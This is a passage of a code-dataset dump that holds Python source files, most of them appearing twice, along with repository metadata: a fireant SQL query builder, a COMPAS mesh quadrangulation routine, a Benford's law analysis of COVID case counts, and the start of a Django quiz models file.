path_flattened + '_manifest.csv',
args.min_duration,
args.max_duration)
if __name__ == "__main__":
main()
| true
| true
|
1c40d71a856cf0d96408fe13f437a7c391a85183
| 10,511
|
py
|
Python
|
fireant/queries/builder/query_builder.py
|
mikeengland/fireant
|
63c12728c11f1fb252265459f8b8f384d20414b9
|
[
"Apache-2.0"
] | 122
|
2016-08-05T13:34:52.000Z
|
2022-03-15T13:21:13.000Z
|
fireant/queries/builder/query_builder.py
|
mikeengland/fireant
|
63c12728c11f1fb252265459f8b8f384d20414b9
|
[
"Apache-2.0"
] | 321
|
2016-08-10T08:48:15.000Z
|
2021-07-28T13:08:18.000Z
|
fireant/queries/builder/query_builder.py
|
mikeengland/fireant
|
63c12728c11f1fb252265459f8b8f384d20414b9
|
[
"Apache-2.0"
] | 27
|
2016-08-10T08:11:08.000Z
|
2021-08-23T08:14:37.000Z
|
from typing import TYPE_CHECKING, Union
from pypika import Order
from fireant.dataset.fields import Field
from fireant.exceptions import DataSetException
from fireant.utils import (
deepcopy,
immutable,
)
from ..execution import fetch_data
from ..finders import find_field_in_modified_field
from ..sets import (
apply_set_dimensions,
omit_set_filters,
)
if TYPE_CHECKING:
from fireant.dataset import DataSet
class QueryException(DataSetException):
pass
def add_hints(queries, hint=None):
return [query.hint(hint) if hint is not None and hasattr(query.__class__, "hint") else query for query in queries]
def get_column_names(database, table):
column_definitions = database.get_column_definitions(table._schema._name, table._table_name)
return {column_definition[0] for column_definition in column_definitions}
def validate_fields(fields, dataset):
fields = [find_field_in_modified_field(field) for field in fields]
invalid = [field.alias for field in fields if field not in dataset.fields]
if not invalid:
return
raise DataSetException(
"Only fields from dataset can be used in a dataset query. Found invalid fields: {}.".format(", ".join(invalid))
)
def _strip_modifiers(fields):
for field in fields:
node = field
while hasattr(node, "dimension"):
node = node.dimension
yield node
class QueryBuilder(object):
"""
This is the base class for building dataset queries. This class provides an interface for building dataset queries
via a set of functions which can be chained together.
"""
def __init__(self, dataset: 'DataSet'):
"""
:param dataset: DataSet to build the query for
"""
self.dataset = dataset
self.table = dataset.table
self._dimensions = []
self._filters = []
self._orders = None
self._client_limit = None
self._client_offset = None
self._query_limit = None
self._query_offset = None
# noinspection PyDefaultArgument
def __deepcopy__(self, memodict={}):
fields = [d for d in self._dimensions]
if self._orders is not None:
fields += [field for (field, _) in self._orders]
for field in fields:
field = find_field_in_modified_field(field)
memodict[id(field)] = field
return deepcopy(self, memodict)
@immutable
def dimension(self, *dimensions):
"""
Add one or more dimensions when building a dataset query.
:param dimensions:
Dimensions to add to the query
:return:
A copy of the query with the dimensions added.
"""
validate_fields(dimensions, self.dataset)
aliases = {dimension.alias for dimension in self._dimensions}
self._dimensions += [dimension for dimension in dimensions if dimension.alias not in aliases]
@immutable
def filter(self, *filters):
"""
Add one or more filters when building a dataset query.
:param filters:
Filters to add to the query
:return:
A copy of the query with the filters added.
"""
validate_fields([fltr.field for fltr in filters], self.dataset)
self._filters += [f for f in filters]
@immutable
def orderby(self, field: Field, orientation: Order = None):
"""
:param field:
The element to order by, either a metric or dimension.
:param orientation:
The directionality to order by, either ascending or descending.
:return:
A copy of the query with the order by added.
"""
validate_fields([field], self.dataset)
if self._orders is None:
self._orders = []
if field is not None:
self._orders += [(field, orientation)]
@immutable
def limit_query(self, limit):
"""
Sets the limit of the query.
:param limit:
A limit on the number of database rows returned.
:return:
A copy of the query with the query limit set.
"""
self._query_limit = limit
@immutable
def offset_query(self, offset):
"""
Sets the offset of the query.
:param offset:
A offset on the number of database rows returned.
:return:
A copy of the query with the query offset set.
"""
self._query_offset = offset
@immutable
def limit_client(self, limit):
"""
Sets the limit to be used when paginating the Pandas Dataframe after the results
have been returned
:param limit:
A limit on the number of dataframe rows returned.
:return:
A copy of the query with the dataframe limit set.
"""
self._client_limit = limit
@immutable
def offset_client(self, offset):
"""
Sets the offset to be used when paginating the Pandas Dataframe after the results
have been returned
:param offset:
A offset on the number of dataframe rows returned
:return:
A copy of the query with the dataframe offset set.
"""
self._client_offset = offset
@property
def dimensions(self):
"""
Returns a list of Field instances, that might include newly created set dimensions.
Set dimensions are generated at this level because the `ResultSet` filter modifier can artificially
create dimensions, which widgets need to be aware in order to properly render the data. Moving this to
`make_slicer_query_with_totals_and_references` function is not possible, even if we defaulted to using
same alias as the referenced dimension/metric, given that would cause aliases clashes. Dimensions can
be mostly replaced, but that's not the case for metrics.
:return: A list of Field instances.
"""
return apply_set_dimensions(self._dimensions, self._filters, self.dataset)
@property
def filters(self):
"""
Returns a list of Filter instances, that might omit filters wrapped with `ResultSet` filter modifier.
:return: A list of Filter instances.
"""
return omit_set_filters(self._filters)
@property
def orders(self):
"""
Return orders.
:return: None or a list of tuples shaped as Field instance and ordering.
"""
return self._orders or self.default_orders
@property
def default_orders(self):
"""
Return orders based on the provided dimensions.
:return: A list of tuples shaped as Field instance and ordering.
"""
dimension_orders = []
for dimension in self.dimensions:
if not dimension.is_aggregate:
dimension_orders.append((dimension, None))
return dimension_orders
@property
def sql(self):
"""
Serialize this query builder object to a set of Pypika/SQL queries.
This is the base implementation shared by two implementations: the query to fetch data for a dataset request and
the query to fetch choices for dimensions.
This function only handles dimensions (select+group by) and filtering (where/having), which is everything needed
for the query to fetch choices for dimensions.
The dataset query extends this with metrics, references, and totals.
"""
raise NotImplementedError()
def fetch(self, hint=None):
"""
Fetches the data for this query instance and returns it in an instance of `pd.DataFrame`
:param hint:
For database vendors that support it, add a query hint to collect analytics on the queries triggered by
fireant.
"""
queries = add_hints(self.sql, hint)
max_rows_returned, data = fetch_data(self.dataset.database, queries, self.dimensions)
return self._transform_for_return(data, max_rows_returned=max_rows_returned)
def _apply_pagination(self, query):
# Some platforms require an order by when pagination is used. Therefore, if there is no ordering set,
# we just default to the first column.
if not self.orders:
query = query.orderby(1)
query = query.limit(min(self._query_limit or float('inf'), self.dataset.database.max_result_set_size))
return query.offset(self._query_offset)
def _transform_for_return(self, widget_data, **metadata) -> Union[dict, list]:
return (
dict(data=widget_data, metadata=dict(**metadata))
if self.dataset.return_additional_metadata
else widget_data
)
class ReferenceQueryBuilderMixin:
"""
This is a mixin class for building dataset queries that allow references. This class provides an interface for
building dataset queries via a set of functions which can be chained together.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._references = []
@immutable
def reference(self, *references):
"""
Add one or more references for a dimension when building a dataset query.
:param references:
References to add to the query
:return:
A copy of the query with the references added.
"""
validate_fields([reference.field for reference in references], self.dataset)
self._references += references
class WidgetQueryBuilderMixin:
"""
This is a mixin class for building dataset queries that allow widgets. This class provides an interface for
building dataset queries via a set of functions which can be chained together.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._widgets = []
def _validate(self):
for widget in self._widgets:
if hasattr(widget, "validate"):
widget.validate(self._dimensions)
@immutable
def widget(self, *widgets):
"""
Add one or more widgets when building a dataset query.
:param widgets:
Widgets to add to the query
:return:
A copy of the query with the widgets added.
"""
validate_fields([field for widget in widgets for field in widget.metrics], self.dataset)
self._widgets += widgets
| 32.045732
| 120
| 0.643802
|
from typing import TYPE_CHECKING, Union
from pypika import Order
from fireant.dataset.fields import Field
from fireant.exceptions import DataSetException
from fireant.utils import (
deepcopy,
immutable,
)
from ..execution import fetch_data
from ..finders import find_field_in_modified_field
from ..sets import (
apply_set_dimensions,
omit_set_filters,
)
if TYPE_CHECKING:
from fireant.dataset import DataSet
class QueryException(DataSetException):
pass
def add_hints(queries, hint=None):
return [query.hint(hint) if hint is not None and hasattr(query.__class__, "hint") else query for query in queries]
def get_column_names(database, table):
column_definitions = database.get_column_definitions(table._schema._name, table._table_name)
return {column_definition[0] for column_definition in column_definitions}
def validate_fields(fields, dataset):
fields = [find_field_in_modified_field(field) for field in fields]
invalid = [field.alias for field in fields if field not in dataset.fields]
if not invalid:
return
raise DataSetException(
"Only fields from dataset can be used in a dataset query. Found invalid fields: {}.".format(", ".join(invalid))
)
def _strip_modifiers(fields):
for field in fields:
node = field
while hasattr(node, "dimension"):
node = node.dimension
yield node
class QueryBuilder(object):
def __init__(self, dataset: 'DataSet'):
self.dataset = dataset
self.table = dataset.table
self._dimensions = []
self._filters = []
self._orders = None
self._client_limit = None
self._client_offset = None
self._query_limit = None
self._query_offset = None
def __deepcopy__(self, memodict={}):
fields = [d for d in self._dimensions]
if self._orders is not None:
fields += [field for (field, _) in self._orders]
for field in fields:
field = find_field_in_modified_field(field)
memodict[id(field)] = field
return deepcopy(self, memodict)
@immutable
def dimension(self, *dimensions):
validate_fields(dimensions, self.dataset)
aliases = {dimension.alias for dimension in self._dimensions}
self._dimensions += [dimension for dimension in dimensions if dimension.alias not in aliases]
@immutable
def filter(self, *filters):
validate_fields([fltr.field for fltr in filters], self.dataset)
self._filters += [f for f in filters]
@immutable
def orderby(self, field: Field, orientation: Order = None):
validate_fields([field], self.dataset)
if self._orders is None:
self._orders = []
if field is not None:
self._orders += [(field, orientation)]
@immutable
def limit_query(self, limit):
self._query_limit = limit
@immutable
def offset_query(self, offset):
self._query_offset = offset
@immutable
def limit_client(self, limit):
self._client_limit = limit
@immutable
def offset_client(self, offset):
self._client_offset = offset
@property
def dimensions(self):
return apply_set_dimensions(self._dimensions, self._filters, self.dataset)
@property
def filters(self):
return omit_set_filters(self._filters)
@property
def orders(self):
return self._orders or self.default_orders
@property
def default_orders(self):
dimension_orders = []
for dimension in self.dimensions:
if not dimension.is_aggregate:
dimension_orders.append((dimension, None))
return dimension_orders
@property
def sql(self):
raise NotImplementedError()
def fetch(self, hint=None):
queries = add_hints(self.sql, hint)
max_rows_returned, data = fetch_data(self.dataset.database, queries, self.dimensions)
return self._transform_for_return(data, max_rows_returned=max_rows_returned)
def _apply_pagination(self, query):
if not self.orders:
query = query.orderby(1)
query = query.limit(min(self._query_limit or float('inf'), self.dataset.database.max_result_set_size))
return query.offset(self._query_offset)
def _transform_for_return(self, widget_data, **metadata) -> Union[dict, list]:
return (
dict(data=widget_data, metadata=dict(**metadata))
if self.dataset.return_additional_metadata
else widget_data
)
class ReferenceQueryBuilderMixin:
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._references = []
@immutable
def reference(self, *references):
validate_fields([reference.field for reference in references], self.dataset)
self._references += references
class WidgetQueryBuilderMixin:
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._widgets = []
def _validate(self):
for widget in self._widgets:
if hasattr(widget, "validate"):
widget.validate(self._dimensions)
@immutable
def widget(self, *widgets):
validate_fields([field for widget in widgets for field in widget.metrics], self.dataset)
self._widgets += widgets
| true
| true
|
1c40d7494928228b274188b3277cc77f6aa633df
| 5,270
|
py
|
Python
|
src/compas_rv2/singular/algorithms/propagation.py
|
selinabitting/compas-RV2
|
0884cc00d09c8f4a75eb2b97614105e4c8bfd818
|
[
"MIT"
] | 4
|
2022-01-17T19:17:22.000Z
|
2022-01-21T18:06:02.000Z
|
src/compas_rv2/singular/algorithms/propagation.py
|
selinabitting/compas-RV2
|
0884cc00d09c8f4a75eb2b97614105e4c8bfd818
|
[
"MIT"
] | null | null | null |
src/compas_rv2/singular/algorithms/propagation.py
|
selinabitting/compas-RV2
|
0884cc00d09c8f4a75eb2b97614105e4c8bfd818
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from compas.geometry import discrete_coons_patch
from ..utilities import list_split
def quadrangulate_mesh(mesh, sources):
"""Quadrangulate the faces of a mesh by adding edges from vertex sources.
Returns
-------
mesh : Mesh
A mesh to quadrangulate.
sources : list
A list of vertex keys to use as sources to add edges for quandrangulation.
References
----------
.. [1] Oval et al., *Feature-based Topology Finding of Patterns for Shell Structures*. Automation in Construction. 2019.
"""
sources_to_visit = sources[:]
count = 1000
while sources_to_visit and count:
count -= 1
vkey = sources_to_visit.pop()
for fkey in mesh.vertex_faces(vkey):
face_vertices = mesh.face_vertices(fkey)[:]
if len(face_vertices) != 4:
new_sources = quadrangulate_face(mesh, fkey, sources)
for vkey in face_vertices:
if vkey in sources_to_visit:
sources_to_visit.remove(vkey)
sources += new_sources
sources_to_visit += new_sources
def quadrangulate_face(mesh, fkey, sources):
face_vertices = mesh.face_vertices(fkey)[:]
# differentiate sources and non sources
sources = [vkey for vkey in face_vertices if vkey in sources]
non_sources = [vkey for vkey in face_vertices if vkey not in sources]
new_sources = []
if len(non_sources) == 4:
a, b, c, d = non_sources
ab, bc, cd, da = list_split(face_vertices + face_vertices[:1], [face_vertices.index(vkey) for vkey in non_sources])
# add missing vertices
for i, edges in enumerate([[ab, cd], [bc, da]]):
uv, wx = edges
# all cases
if len(uv) == len(wx):
# no subdivision needed
continue
elif len(uv) == 2 and len(wx) != 2:
# subdivide uv
n = len(wx) - len(uv) + 1
new_points = [mesh.edge_point(uv[0], uv[1], float(k) / float(n)) for k in range(n + 1)][1: -1]
new_vertices = [mesh.add_vertex(attr_dict={xyz: value for xyz, value in zip(['x', 'y', 'z'], point)}) for point in new_points]
new_sources += new_vertices
if i == 0:
ab = [uv[0]] + new_vertices + [uv[-1]]
elif i == 1:
bc = [uv[0]] + new_vertices + [uv[-1]]
update_adjacent_face(mesh, uv[1], uv[0], list(reversed(new_vertices)))
elif len(uv) != 2 and len(wx) == 2:
# subdivide wx
n = len(uv) - len(wx) + 1
new_points = [mesh.edge_point(wx[0], wx[1], float(k) / float(n)) for k in range(n + 1)][1: -1]
new_vertices = [mesh.add_vertex(attr_dict={xyz: value for xyz, value in zip(['x', 'y', 'z'], point)}) for point in new_points]
new_sources += new_vertices
if i == 0:
cd = [wx[0]] + new_vertices + [wx[-1]]
elif i == 1:
da = [wx[0]] + new_vertices + [wx[-1]]
# update adjacent faces
update_adjacent_face(mesh, wx[1], wx[0], list(reversed(new_vertices)))
elif len(uv) != 2 and len(wx) != 2 and len(uv) != len(wx):
pass
# apply Takayama's work
# print('not implemented yet')
mesh.delete_face(fkey)
discrete_coons_patch_mesh(mesh, ab, bc, list(reversed(cd)), list(reversed(da)))
else:
pass
return new_sources
def discrete_coons_patch_mesh(mesh, ab, bc, dc, ad):
ab_xyz = [mesh.vertex_coordinates(vkey) for vkey in ab]
bc_xyz = [mesh.vertex_coordinates(vkey) for vkey in bc]
dc_xyz = [mesh.vertex_coordinates(vkey) for vkey in dc]
ad_xyz = [mesh.vertex_coordinates(vkey) for vkey in ad]
coons_vertices, coons_face_vertices = discrete_coons_patch(ab_xyz, bc_xyz, dc_xyz, ad_xyz)
n = len(ab)
m = len(bc)
vertex_index_map = {}
for i, vkey in enumerate(ad):
vertex_index_map[i] = vkey
for i, vkey in enumerate(bc):
vertex_index_map[m * (n - 1) + i] = vkey
for i, vkey in enumerate(ab):
vertex_index_map[i * m] = vkey
for i, vkey in enumerate(dc):
vertex_index_map[m - 1 + i * m] = vkey
max_vkey = max(list(mesh.vertices()))
for i, vertex in enumerate(coons_vertices):
if i not in vertex_index_map:
max_vkey += 1
vertex_index_map[i] = max_vkey
mesh.add_vertex(max_vkey, attr_dict={xyz: value for xyz, value in zip(['x', 'y', 'z'], vertex)})
for face in coons_face_vertices:
mesh.add_face(list(reversed([vertex_index_map[vkey] for vkey in face])))
def update_adjacent_face(mesh, u, v, vertices_uv):
fkey = mesh.halfedge[u][v]
if fkey is not None:
face_vertices = mesh.face_vertices(fkey)[:]
i = face_vertices.index(v)
for vkey in reversed(vertices_uv):
face_vertices.insert(i, vkey)
mesh.delete_face(fkey)
mesh.add_face(face_vertices, fkey)
| 35.369128
| 142
| 0.579317
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from compas.geometry import discrete_coons_patch
from ..utilities import list_split
def quadrangulate_mesh(mesh, sources):
sources_to_visit = sources[:]
count = 1000
while sources_to_visit and count:
count -= 1
vkey = sources_to_visit.pop()
for fkey in mesh.vertex_faces(vkey):
face_vertices = mesh.face_vertices(fkey)[:]
if len(face_vertices) != 4:
new_sources = quadrangulate_face(mesh, fkey, sources)
for vkey in face_vertices:
if vkey in sources_to_visit:
sources_to_visit.remove(vkey)
sources += new_sources
sources_to_visit += new_sources
def quadrangulate_face(mesh, fkey, sources):
face_vertices = mesh.face_vertices(fkey)[:]
sources = [vkey for vkey in face_vertices if vkey in sources]
non_sources = [vkey for vkey in face_vertices if vkey not in sources]
new_sources = []
if len(non_sources) == 4:
a, b, c, d = non_sources
ab, bc, cd, da = list_split(face_vertices + face_vertices[:1], [face_vertices.index(vkey) for vkey in non_sources])
for i, edges in enumerate([[ab, cd], [bc, da]]):
uv, wx = edges
if len(uv) == len(wx):
continue
elif len(uv) == 2 and len(wx) != 2:
n = len(wx) - len(uv) + 1
new_points = [mesh.edge_point(uv[0], uv[1], float(k) / float(n)) for k in range(n + 1)][1: -1]
new_vertices = [mesh.add_vertex(attr_dict={xyz: value for xyz, value in zip(['x', 'y', 'z'], point)}) for point in new_points]
new_sources += new_vertices
if i == 0:
ab = [uv[0]] + new_vertices + [uv[-1]]
elif i == 1:
bc = [uv[0]] + new_vertices + [uv[-1]]
update_adjacent_face(mesh, uv[1], uv[0], list(reversed(new_vertices)))
elif len(uv) != 2 and len(wx) == 2:
n = len(uv) - len(wx) + 1
new_points = [mesh.edge_point(wx[0], wx[1], float(k) / float(n)) for k in range(n + 1)][1: -1]
new_vertices = [mesh.add_vertex(attr_dict={xyz: value for xyz, value in zip(['x', 'y', 'z'], point)}) for point in new_points]
new_sources += new_vertices
if i == 0:
cd = [wx[0]] + new_vertices + [wx[-1]]
elif i == 1:
da = [wx[0]] + new_vertices + [wx[-1]]
update_adjacent_face(mesh, wx[1], wx[0], list(reversed(new_vertices)))
elif len(uv) != 2 and len(wx) != 2 and len(uv) != len(wx):
pass
# print('not implemented yet')
mesh.delete_face(fkey)
discrete_coons_patch_mesh(mesh, ab, bc, list(reversed(cd)), list(reversed(da)))
else:
pass
return new_sources
def discrete_coons_patch_mesh(mesh, ab, bc, dc, ad):
ab_xyz = [mesh.vertex_coordinates(vkey) for vkey in ab]
bc_xyz = [mesh.vertex_coordinates(vkey) for vkey in bc]
dc_xyz = [mesh.vertex_coordinates(vkey) for vkey in dc]
ad_xyz = [mesh.vertex_coordinates(vkey) for vkey in ad]
coons_vertices, coons_face_vertices = discrete_coons_patch(ab_xyz, bc_xyz, dc_xyz, ad_xyz)
n = len(ab)
m = len(bc)
vertex_index_map = {}
for i, vkey in enumerate(ad):
vertex_index_map[i] = vkey
for i, vkey in enumerate(bc):
vertex_index_map[m * (n - 1) + i] = vkey
for i, vkey in enumerate(ab):
vertex_index_map[i * m] = vkey
for i, vkey in enumerate(dc):
vertex_index_map[m - 1 + i * m] = vkey
max_vkey = max(list(mesh.vertices()))
for i, vertex in enumerate(coons_vertices):
if i not in vertex_index_map:
max_vkey += 1
vertex_index_map[i] = max_vkey
mesh.add_vertex(max_vkey, attr_dict={xyz: value for xyz, value in zip(['x', 'y', 'z'], vertex)})
for face in coons_face_vertices:
mesh.add_face(list(reversed([vertex_index_map[vkey] for vkey in face])))
def update_adjacent_face(mesh, u, v, vertices_uv):
fkey = mesh.halfedge[u][v]
if fkey is not None:
face_vertices = mesh.face_vertices(fkey)[:]
i = face_vertices.index(v)
for vkey in reversed(vertices_uv):
face_vertices.insert(i, vkey)
mesh.delete_face(fkey)
mesh.add_face(face_vertices, fkey)
| true
| true
|
1c40d7922ee0e9af71035e7e7719d5b089de3727
| 5,468
|
py
|
Python
|
benford.py
|
EivindFa/benfords_law
|
6f2a0ab3f63d21b2caeef8f54922972b10d2b1b7
|
[
"MIT"
] | null | null | null |
benford.py
|
EivindFa/benfords_law
|
6f2a0ab3f63d21b2caeef8f54922972b10d2b1b7
|
[
"MIT"
] | null | null | null |
benford.py
|
EivindFa/benfords_law
|
6f2a0ab3f63d21b2caeef8f54922972b10d2b1b7
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import math
from scipy import stats
# data source: https://ourworldindata.org/coronavirus-source-data
def setup(csv_filename, country):
df = pd.read_csv(csv_filename)
df = df.loc[: , ["location", "date", "new_cases" ]]
df = df[df["location"] == country]
# Data prep
df = df[df["new_cases"].notna()] # remove not a number-rows
df = df[df["new_cases"] > 0]
df.drop_duplicates()
print(df.head())
return df
def statistics(df):
print("Dataset size", len(df["new_cases"].tolist()))
def calculate_first_digit(df):
new_cases = df["new_cases"]
first_digit = []
for row in df["new_cases"]: # get first digit
try:
first_digit.append(int(str(row)[:1]))
except:
first_digit.append(0)
print(row)
df["first_digit"] = first_digit
df = df.drop(df[df.first_digit <= 0].index) # drop rows with 0 values
n = len(df["first_digit"].tolist())
count_first_digit = df["first_digit"].value_counts(sort=False)#count number of 1's, 2's, 3's and so on
count_first_digit.to_frame().to_numpy()
total_count = count_first_digit.sum() # number of numbers in list. Equal to len(df["first_digit"].tolist())
percentage = []
for elem in count_first_digit:
p = float("{:.4f}".format( elem / total_count))
percentage.append(p)
x = np.linspace(1,9,9)
percentage = dict(zip(x, percentage))
return df, percentage
def calculate_first_two_digits(df):
first_two = []
for row in df["new_cases"]:
temp_int = int(row*10)
first_two.append(int(str(temp_int)[:2]))
df["first_two"] = first_two
count_first_two = df["first_two"].value_counts(sort=False)[1:]
print(count_first_two)
count_first_two.to_numpy()
total_count = count_first_two.sum()
percentage = []
for elem in count_first_two:
percentage.append(float("{:.4f}".format( elem / total_count)))
return df, percentage
def plot_figure(percentage, perfect_benford):
_x = np.linspace(1, 9, 9)
plt.plot(_x,percentage, label="first digit benford") # calculated perfentage
plt.plot(_x, list(perfect_benford.values()), label="perfect benford")
plt.xlabel("Digits")
plt.ylabel("Percentage")
plt.legend()
plt.show()
def get_perfect_benford():
x = np.linspace(1,9,9)
y = [0.31, 0.176, 0.125, 0.097,0.079, 0.067, 0.058, 0.051, 0.046]
return dict(zip(x,y))
def pearson_coefficient(list_a, list_b):
assert (len(list_a) != 0)
assert (len(list_b) != 0) # list b is perfect benford
sum_a = sum(list_a)
sum_b = sum(list_b)
mean_a = float(sum_a / len(list_a))
mean_b = float(sum_b / len(list_b))
list_mean_a = [(x - mean_a) for x in list_a]
list_mean_b = [(y - mean_b) for y in list_b]
numerator = sum(x * y for x,y in zip(list_mean_a, list_mean_b))
denominator = math.sqrt(sum(x*x for x in list_mean_a) * sum(y * y for y in list_mean_b))
if (denominator != 0):
p_value = numerator / denominator
else:
p_value = 0
print("------ Pearson coefficient --------")
print(p_value)
return p_value
def mantissa_arc_test(list_a):
"""
The mantissa arc test.
:parm list_a: df["new_cases"]
:return: p-value and a plot
"""
x_coordinates = [(math.cos(2*math.pi * (math.log10(x) % 1))) for x in list_a] # abscissa - x-coordinate for the mantissa
y_coordinates = [(math.sin(2*math.pi * (math.log10(x) % 1))) for x in list_a] # ordinate
x_nominator = sum(math.cos(2*math.pi * (math.log10(x) % 1)) for x in list_a)
y_nominator = sum(math.sin(2*math.pi * (math.log10(x) % 1)) for x in list_a)
x_coordinate = x_nominator / len(list_a) # Center of mass
y_coordinate = y_nominator / len(list_a) # Center of mass
L_squared = (x_coordinate)**2 + (y_coordinate)**2
p_value = 1 - math.exp(-L_squared * len(list_a))
print("--------- p-value ---------")
print(p_value)
''' Plotting '''
plt.scatter(x_coordinates, y_coordinates)
plt.plot(x_coordinate, y_coordinate, 'o', color="red") # center of mass
plt.axhline(y=0, color='k')
plt.axvline(x=0, color='k')
plt.show()
### TODO: implement chi-squared
def chi_squared(df, perfect_benford):
'''
#observed, expected ....
H0: status_que_hypothesis
'''
sample_size = len(df["new_cases"].tolist())
benford_distribution = [sample_size*x for x in perfect_benford] # expected distribution
count_first_digit = df["first_digit"].value_counts(sort=False)
residual_squared = [math.pow(x-y, 2) / y for x,y in zip(count_first_digit, benford_distribution)]
degrees_of_freedom = (9-1)*(2-1)
p_value= stats.chi2.pdf(sum(residual_squared), degrees_of_freedom)
print("chi squared p-value: ",p_value)
#print("residual", residual)
#print(benford_distribution)
#print("Not implemented yet")
def main():
df = setup("owid-covid-data.csv","Belgium") #csv_filename, country
statistics(df) # Get info about the dataset
df, percentage = calculate_first_digit(df)
print(df.head())
chi_squared(df, list(get_perfect_benford().values()))
pearson = pearson_coefficient(list(percentage.values()), get_perfect_benford())
mantissa_arc_test(df["new_cases"].tolist())
plot_figure(list(percentage.values()), get_perfect_benford())
if __name__ == "__main__":
main()
| 35.738562
| 124
| 0.647952
|
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import math
from scipy import stats
def setup(csv_filename, country):
df = pd.read_csv(csv_filename)
df = df.loc[: , ["location", "date", "new_cases" ]]
df = df[df["location"] == country]
df = df[df["new_cases"].notna()]
df = df[df["new_cases"] > 0]
df.drop_duplicates()
print(df.head())
return df
def statistics(df):
print("Dataset size", len(df["new_cases"].tolist()))
def calculate_first_digit(df):
new_cases = df["new_cases"]
first_digit = []
for row in df["new_cases"]:
try:
first_digit.append(int(str(row)[:1]))
except:
first_digit.append(0)
print(row)
df["first_digit"] = first_digit
df = df.drop(df[df.first_digit <= 0].index)
n = len(df["first_digit"].tolist())
count_first_digit = df["first_digit"].value_counts(sort=False)
count_first_digit.to_frame().to_numpy()
total_count = count_first_digit.sum() # number of numbers in list. Equal to len(df["first_digit"].tolist())
percentage = []
for elem in count_first_digit:
p = float("{:.4f}".format( elem / total_count))
percentage.append(p)
x = np.linspace(1,9,9)
percentage = dict(zip(x, percentage))
return df, percentage
def calculate_first_two_digits(df):
first_two = []
for row in df["new_cases"]:
temp_int = int(row*10)
first_two.append(int(str(temp_int)[:2]))
df["first_two"] = first_two
count_first_two = df["first_two"].value_counts(sort=False)[1:]
print(count_first_two)
count_first_two.to_numpy()
total_count = count_first_two.sum()
percentage = []
for elem in count_first_two:
percentage.append(float("{:.4f}".format( elem / total_count)))
return df, percentage
def plot_figure(percentage, perfect_benford):
_x = np.linspace(1, 9, 9)
plt.plot(_x,percentage, label="first digit benford") # calculated perfentage
plt.plot(_x, list(perfect_benford.values()), label="perfect benford")
plt.xlabel("Digits")
plt.ylabel("Percentage")
plt.legend()
plt.show()
def get_perfect_benford():
x = np.linspace(1,9,9)
y = [0.31, 0.176, 0.125, 0.097,0.079, 0.067, 0.058, 0.051, 0.046]
return dict(zip(x,y))
def pearson_coefficient(list_a, list_b):
assert (len(list_a) != 0)
assert (len(list_b) != 0) # list b is perfect benford
sum_a = sum(list_a)
sum_b = sum(list_b)
mean_a = float(sum_a / len(list_a))
mean_b = float(sum_b / len(list_b))
list_mean_a = [(x - mean_a) for x in list_a]
list_mean_b = [(y - mean_b) for y in list_b]
numerator = sum(x * y for x,y in zip(list_mean_a, list_mean_b))
denominator = math.sqrt(sum(x*x for x in list_mean_a) * sum(y * y for y in list_mean_b))
if (denominator != 0):
p_value = numerator / denominator
else:
p_value = 0
print("------ Pearson coefficient --------")
print(p_value)
return p_value
def mantissa_arc_test(list_a):
x_coordinates = [(math.cos(2*math.pi * (math.log10(x) % 1))) for x in list_a] # abscissa - x-coordinate for the mantissa
y_coordinates = [(math.sin(2*math.pi * (math.log10(x) % 1))) for x in list_a] # ordinate
x_nominator = sum(math.cos(2*math.pi * (math.log10(x) % 1)) for x in list_a)
y_nominator = sum(math.sin(2*math.pi * (math.log10(x) % 1)) for x in list_a)
x_coordinate = x_nominator / len(list_a) # Center of mass
y_coordinate = y_nominator / len(list_a) # Center of mass
L_squared = (x_coordinate)**2 + (y_coordinate)**2
p_value = 1 - math.exp(-L_squared * len(list_a))
print("--------- p-value ---------")
print(p_value)
plt.scatter(x_coordinates, y_coordinates)
plt.plot(x_coordinate, y_coordinate, 'o', color="red") # center of mass
plt.axhline(y=0, color='k')
plt.axvline(x=0, color='k')
plt.show()
### TODO: implement chi-squared
def chi_squared(df, perfect_benford):
sample_size = len(df["new_cases"].tolist())
benford_distribution = [sample_size*x for x in perfect_benford] # expected distribution
count_first_digit = df["first_digit"].value_counts(sort=False)
residual_squared = [math.pow(x-y, 2) / y for x,y in zip(count_first_digit, benford_distribution)]
degrees_of_freedom = (9-1)*(2-1)
p_value= stats.chi2.pdf(sum(residual_squared), degrees_of_freedom)
print("chi squared p-value: ",p_value)
#print("residual", residual)
#print(benford_distribution)
#print("Not implemented yet")
def main():
df = setup("owid-covid-data.csv","Belgium") #csv_filename, country
statistics(df) # Get info about the dataset
df, percentage = calculate_first_digit(df)
print(df.head())
chi_squared(df, list(get_perfect_benford().values()))
pearson = pearson_coefficient(list(percentage.values()), get_perfect_benford())
mantissa_arc_test(df["new_cases"].tolist())
plot_figure(list(percentage.values()), get_perfect_benford())
if __name__ == "__main__":
main()
| true
| true
|
1c40d79baf9dc72b1930e86aa0624e64fd126af1
| 3,557
|
py
|
Python
|
createaquiz/quiz/models.py
|
ranajaydas/CreateAQuiz
|
d83ec4aa08b61ffb2f044c3d0cc3accf81e826b7
|
[
"MIT"
] | null | null | null |
createaquiz/quiz/models.py
|
ranajaydas/CreateAQuiz
|
d83ec4aa08b61ffb2f044c3d0cc3accf81e826b7
|
[
"MIT"
] | 10
|
2021-03-19T08:08:58.000Z
|
2022-03-12T00:12:36.000Z
|
createaquiz/quiz/models.py
|
ranajaydas/CreateAQuiz
|
d83ec4aa08b61ffb2f044c3d0cc3accf81e826b7
|
[
"MIT"
] | null | null | null |
from random import shuffle
from django.db import models
from django.shortcuts import reverse
from django.conf import settings
from core.utils import ImageResizeUploadS3
class CustomModel:
"""Common Model inherited by other models."""
def get_model(self):
return self.__class__.__name__
class Tag(CustomModel, models.Model):
name = models.CharField(max_length=31, unique=True)
slug = models.SlugField(max_length=31, unique=True, help_text='A label for URL config')
class Meta:
ordering = ['name']
def __str__(self):
return self.name.title()
def get_absolute_url(self):
return reverse('tag_detail', kwargs={'slug': self.slug})
def get_update_url(self):
return reverse('tag_update', kwargs={'slug': self.slug})
